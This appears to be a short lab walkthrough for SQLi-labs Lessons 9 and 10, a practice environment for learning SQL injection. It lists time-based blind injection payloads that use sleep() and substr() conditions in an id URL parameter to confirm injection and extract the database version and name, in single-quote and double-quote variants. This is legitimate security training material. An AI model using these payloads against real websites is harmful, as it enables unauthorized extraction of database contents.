SQLi-labs: Lesson-9

Time-based SQLi.

  1. Basic query to detect sqli

    ?id=1' and sleep(10)--+

  2. Get version

    ?id=1' and if(substr(version(),1,1)=5, sleep(10),null)--+

  3. Get database

    ?id=1' and if(substr(database(),1,1)='s', sleep(10),null)--+

  4. Using the similar way to get table name and column names.

SQLi-labs: Lesson-10

Time-based SQLi.

Similar to Lesson-9, but use double quote instead of single quote.

?id=1" and sleep(10)--+

?id=1" and if(substr(version(),1,1)=5, sleep(10),null)--+

?id=1" and if(substr(database(),1,1)='s', sleep(10),null)--+

results matching ""

    No results matching ""